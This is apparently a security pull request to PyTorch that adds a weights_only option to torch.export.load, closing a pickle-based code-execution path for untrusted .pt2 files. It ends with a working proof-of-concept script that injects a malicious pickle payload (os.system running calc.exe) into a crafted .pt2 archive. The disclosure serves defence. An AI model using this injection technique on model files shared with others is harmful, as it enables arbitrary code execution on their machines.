### PR TITLE
[Security] Fix potential Arbitrary Code Execution in `torch.export.load` by forwarding `weights_only`

### DIFF
--- a/torch/_export/serde/serialize.py
+++ b/torch/_export/serde/serialize.py
@@ -422,6 +422,7 @@ def serialize_torch_artifact(
 
 def deserialize_torch_artifact(
     serialized: dict[str, Any] | tuple[Any, ...] | bytes,
+    weights_only: bool = False,
 ):
     if isinstance(serialized, (dict, tuple)):
         return serialized
@@ -429,18 +430,22 @@ def deserialize_torch_artifact(
         return {}
     buffer = io.BytesIO(serialized)
     buffer.seek(0)
-    # weights_only=False as we want to load custom objects here (e.g. ScriptObject)
-    try:
+    
+    if weights_only:
         artifact = torch.load(buffer, weights_only=True)
-    except Exception as e:
-        buffer.seek(0)
-        artifact = torch.load(buffer, weights_only=False)
-        log.warning(
-            "Fallback to weights_only=False succeeded. "
-            "Loaded object of type %s after initial failure: %s",
-            type(artifact),
-            exc_info=e,
-        )
+    else:
+        # weights_only=False as we want to load custom objects here (e.g. ScriptObject)
+        try:
+            artifact = torch.load(buffer, weights_only=True)
+        except Exception as e:
+            buffer.seek(0)
+            artifact = torch.load(buffer, weights_only=False)
+            log.warning(
+                "Fallback to weights_only=False succeeded. "
+                "Loaded object of type %s after initial failure: %s",
+                type(artifact),
+                exc_info=e,
+            )
     if not isinstance(artifact, (tuple, dict)):
         raise AssertionError(f"expected tuple or dict, got {type(artifact).__name__}")
     return artifact
@@ -2830,6 +2835,8 @@ class GraphModuleDeserializer(metaclass=Final):
         | bytes
         | None = None,
         symbol_name_to_range: dict[str, symbolic_shapes.ValueRanges] | None = None,
+        *,
+        weights_only: bool = False,
     ) -> Result:
         global _CURRENT_DESERIALIZER
         if _CURRENT_DESERIALIZER is not None:
@@ -2872,7 +2879,7 @@ class GraphModuleDeserializer(metaclass=Final):
                 "Identity": torch.utils._sympy.functions.Identity,
             }
             self.symbol_name_to_symbol: dict[str, sympy.Symbol] = {}
-            self.constants = deserialize_torch_artifact(constants)
+            self.constants = deserialize_torch_artifact(constants, weights_only=weights_only)
             self.signature = self.deserialize_signature(
                 serialized_graph_module.signature
             )
@@ -2908,7 +2915,7 @@ class GraphModuleDeserializer(metaclass=Final):
                 self.shape_env.unbacked_symint_counter += 1
 
             if example_inputs is not None and len(example_inputs) > 0:
-                self.example_inputs = deserialize_torch_artifact(example_inputs)
+                self.example_inputs = deserialize_torch_artifact(example_inputs, weights_only=weights_only)
             else:
                 self.example_inputs = None
             self.deserialize_graph(serialized_graph_module.graph)
@@ -2934,7 +2941,7 @@ class GraphModuleDeserializer(metaclass=Final):
                 signature=self.signature,
                 module_call_graph=module_call_graph,
                 names_to_symbols=self.symbol_name_to_symbol,
-                state_dict=deserialize_torch_artifact(serialized_state_dict),
+                state_dict=deserialize_torch_artifact(serialized_state_dict, weights_only=weights_only),
                 constants=self.constants,
                 example_inputs=self.example_inputs,
             )
@@ -3494,6 +3501,7 @@ class ExportedProgramDeserializer(metaclass=Final):
         | bytes
         | None = None,
         *,
+        weights_only: bool = False,
         _unsafe_skip_version_check=False,
     ) -> ep.ExportedProgram:
         if not isinstance(exported_program, ExportedProgram):
@@ -3525,6 +3533,7 @@ class ExportedProgramDeserializer(metaclass=Final):
             constants,
             example_inputs,
             symbol_name_to_range,
+            weights_only=weights_only,
         )
         range_constraints = self.deserialize_range_constraints(
             symbol_name_to_range,
@@ -3687,6 +3696,7 @@ def deserialize(
     artifact: SerializedArtifact,
     expected_opset_version: dict[str, int] | None = None,
     *,
+    weights_only: bool = False,
     _unsafe_skip_version_check=False,
 ) -> ep.ExportedProgram:
     if not isinstance(artifact.exported_program, bytes):
@@ -3701,6 +3711,7 @@ def deserialize(
         artifact.state_dict,
         artifact.constants,
         artifact.example_inputs,
+        weights_only=weights_only,
         _unsafe_skip_version_check=_unsafe_skip_version_check,
     )
 

--- a/torch/export/__init__.py
+++ b/torch/export/__init__.py
@@ -285,6 +285,7 @@ def load(
     *,
     extra_files: dict[str, Any] | None = None,
     expected_opset_version: dict[str, int] | None = None,
+    weights_only: bool = False,
 ) -> ExportedProgram:
     """
 
@@ -308,6 +309,11 @@ def load(
 
         expected_opset_version (Optional[Dict[str, int]]): A map of opset names
          to expected opset versions
+
+        weights_only (bool): Indicates whether to only load weights. If False,
+         it allows loading custom objects and other complex artifacts, which
+         could be a security risk if the file is from an untrusted source.
+         Defaults to False for backward compatibility.
 
     Returns:
         An :class:`ExportedProgram` object
@@ -343,6 +349,7 @@ def load(
         pt2_contents = load_pt2(
             f,
             expected_opset_version=expected_opset_version,
+            weights_only=weights_only,
         )
     except RuntimeError:
         log.warning("Ran into the following error when deserializing", exc_info=True)
@@ -429,7 +436,11 @@ def load(
         )
 
         # Deserialize ExportedProgram
-        ep = deserialize(artifact, expected_opset_version)
+        ep = deserialize(
+            artifact,
+            expected_opset_version,
+            weights_only=weights_only,
+        )
 
         return ep
 

--- a/torch/export/pt2_archive/_package.py
+++ b/torch/export/pt2_archive/_package.py
@@ -845,6 +845,7 @@ def _load_payload_config(
 def _load_state_dict(
     archive_reader: PT2ArchiveReader,
     model_name: str,
+    weights_only: bool = False,
 ) -> dict[str, torch.Tensor] | bytes:
     # Make it BC compatible with legacy weight files
     legacy_weights_file = f"{WEIGHTS_DIR}{model_name}.pt"
@@ -872,7 +873,7 @@ def _load_state_dict(
                     os.path.join(WEIGHTS_DIR, payload_meta.path_name)
                 )
                 state_dict[weight_fqn] = torch.load(
-                    io.BytesIO(weight_bytes), weights_only=False
+                    io.BytesIO(weight_bytes), weights_only=weights_only
                 )
             else:
                 tensor_meta = payload_meta.tensor_meta
@@ -901,6 +902,7 @@ def _load_state_dict(
 def _load_constants(
     archive_reader: PT2ArchiveReader,
     model_name: str,
+    weights_only: bool = False,
 ) -> dict[str, torch.Tensor] | bytes:
     # Make it BC compatible with legacy constant files
     legacy_constants_file = f"{CONSTANTS_DIR}{model_name}.pt"
@@ -930,7 +932,7 @@ def _load_constants(
                         os.path.join(CONSTANTS_DIR, path_name)
                     )
                     constants[constant_fqn] = torch.load(
-                        io.BytesIO(constant_bytes), weights_only=False
+                        io.BytesIO(constant_bytes), weights_only=weights_only
                     )
                 else:
                     tensor_meta = payload_meta.tensor_meta
@@ -949,6 +951,10 @@ def _load_constants(
                     constants[constant_fqn] = constant_tensor
 
             elif path_name.startswith(CUSTOM_OBJ_FILENAME_PREFIX):
+                if weights_only:
+                    raise RuntimeError(
+                        f"Unsupported constant type {path_name} when weights_only is True"
+                    )
                 constant_bytes = archive_reader.read_bytes(
                     os.path.join(CONSTANTS_DIR, path_name)
                 )
@@ -964,6 +970,7 @@ def _load_exported_programs(
     archive_reader: PT2ArchiveReader,
     file_names: list[str],
     expected_opset_version: dict[str, int] | None,
+    weights_only: bool = False,
 ) -> dict[str, ExportedProgram]:
     exported_program_files = [
         file for file in file_names if file.startswith(MODELS_DIR)
@@ -986,8 +993,8 @@ def _load_exported_programs(
         serialized_exported_program = _bytes_to_dataclass(
             schema.ExportedProgram, exported_program_bytes
         )
-        state_dict = _load_state_dict(archive_reader, model_name)
-        constants = _load_constants(archive_reader, model_name)
+        state_dict = _load_state_dict(archive_reader, model_name, weights_only=weights_only)
+        constants = _load_constants(archive_reader, model_name, weights_only=weights_only)
 
         ep = ExportedProgramDeserializer(expected_opset_version).deserialize(
             serialized_exported_program,
@@ -1062,6 +1069,7 @@ def load_pt2(
     num_runners: int = 1,
     device_index: int = -1,
     load_weights_from_disk: bool = False,
+    weights_only: bool = False,
 ) -> PT2ArchiveContents:  # type: ignore[type-arg]
     """
     Loads all the artifacts previously saved with ``package_pt2``.
@@ -1118,7 +1126,7 @@ def load_pt2(
         file_names = archive_reader.get_file_names()
 
         exported_programs = _load_exported_programs(
-            archive_reader, file_names, expected_opset_version
+            archive_reader, file_names, expected_opset_version, weights_only=weights_only
         )
         extra_files = _load_extra_files(archive_reader, file_names)
 
@@ -1144,7 +1152,7 @@ def load_pt2(
                     len(WEIGHTS_DIR) :
                 ]  # remove data/weights/ prefix
                 weight_bytes = archive_reader.read_bytes(file)
-                loaded_weight = torch.load(io.BytesIO(weight_bytes))
+                loaded_weight = torch.load(io.BytesIO(weight_bytes), weights_only=weights_only)
                 weights[weight_file_name] = loaded_weight
 
     if isinstance(f, (io.IOBase, IO)):


### PR DESCRIPTION
**Description**:

This PR addresses a potential security vulnerability discovered during an analysis of the `.pt2` loading mechanism. Currently, `torch.export.load` lacks a parameter to enforce secure deserialization. If a user unknowingly loads an untrusted `.pt2` file that contains `use_pickle: True` in its weights config, or if the file triggers the exception fallback within `deserialize_torch_artifact`, the system implicitly falls back to using `pickle` (`weights_only=False`). This behavior introduces a significant risk of arbitrary code execution.

**Changes Proposed**:
To safely eliminate this risk without breaking existing workflows or legacy files, this PR introduces a `weights_only` parameter to the `torch.export.load` API and propagates it through the internal call chain:

1. **API Update**: Added `weights_only=False` to `torch.export.load`. The default is strictly maintained as `False` to preserve backward compatibility with older formats and existing user pipelines.
2. **Parameter Forwarding**: Propagated the `weights_only` flag down through internal helper functions, including `load_pt2`, `_load_exported_programs`, `_load_state_dict`, `_load_constants`, and `GraphModuleDeserializer.deserialize`.
3. **Safety Enforcement**: 
   - In `deserialize_torch_artifact`, if a user explicitly passes `weights_only=True`, the insecure fallback to `weights_only=False` following a loading exception is explicitly blocked.
   - In `_load_state_dict` and `_load_constants`, the hardcoded `weights_only=False` for pickled config items is replaced with the newly propagated `weights_only` flag.

**Impact**: 
These changes empower users to securely load untrusted `.pt2` archives by explicitly calling `torch.export.load(..., weights_only=True)`. Since the default behavior remains unchanged, there are no breaking changes or side effects for current pipelines, yet the security risk can be fully mitigated when the flag is actively enabled by the user.

**Proof of Concept (PoC)**:
To demonstrate the existence and impact of this vulnerability, I have attached the PoC script used to trigger the insecure deserialization, along with corresponding screenshots of the execution, at the bottom of this PR.

---
*Note: I am a security researcher from China reporting this issue. This PR description was translated and refined using an AI assistant to ensure technical accuracy and clarity.*

### Steps to Reproduce / PoC

```python
import torch
from torch.export import export, save, load
import os
import json
import zipfile
import pickle
import platform

class MyModule(torch.nn.Module):
    def __init__(self):
        super().__init__()
        self.w = torch.nn.Parameter(torch.randn(1))
    def forward(self, x):
        return x + self.w

ep = export(MyModule(), (torch.randn(1),))
save(ep, "benign.pt2")

class Malicious:
    def __reduce__(self):
        cmd = "calc.exe"
        return (os.system, (cmd,))

payload = pickle.dumps(Malicious())

with zipfile.ZipFile("benign.pt2", "r") as z_in:
    first_file = z_in.namelist()[0]
    root_folder = first_file.split('/')[0] if '/' in first_file else first_file.split('\\')[0]
    
    with zipfile.ZipFile("malicious.pt2", "w") as z_out:
        for item in z_in.infolist():
            content = z_in.read(item.filename)
            
            if item.filename.endswith("model_weights_config.json"):
                config = json.loads(content.decode("utf-8"))
                print("[DEBUG] Found model_weights_config.json, injecting payload metadata...")
                
                config["config"]["malicious_rce"] = {
                    "path_name": "malicious_payload",
                    "is_param": False,
                    "use_pickle": True,
                    "tensor_meta": None
                }
                content = json.dumps(config).encode("utf-8")
            
            z_out.writestr(item, content)
        
        malicious_path = f"{root_folder}/data/weights/malicious_payload"
        zip_info = zipfile.ZipInfo(malicious_path)
        z_out.writestr(zip_info, payload)

print("[*] Malicious model 'malicious.pt2' generated.")

torch.export.load("malicious.pt2")
```

<img width="2559" height="1439" alt="图片" src="https://github.com/user-attachments/assets/dc38a670-ed83-4772-8a7d-23f5b4cdd726" />
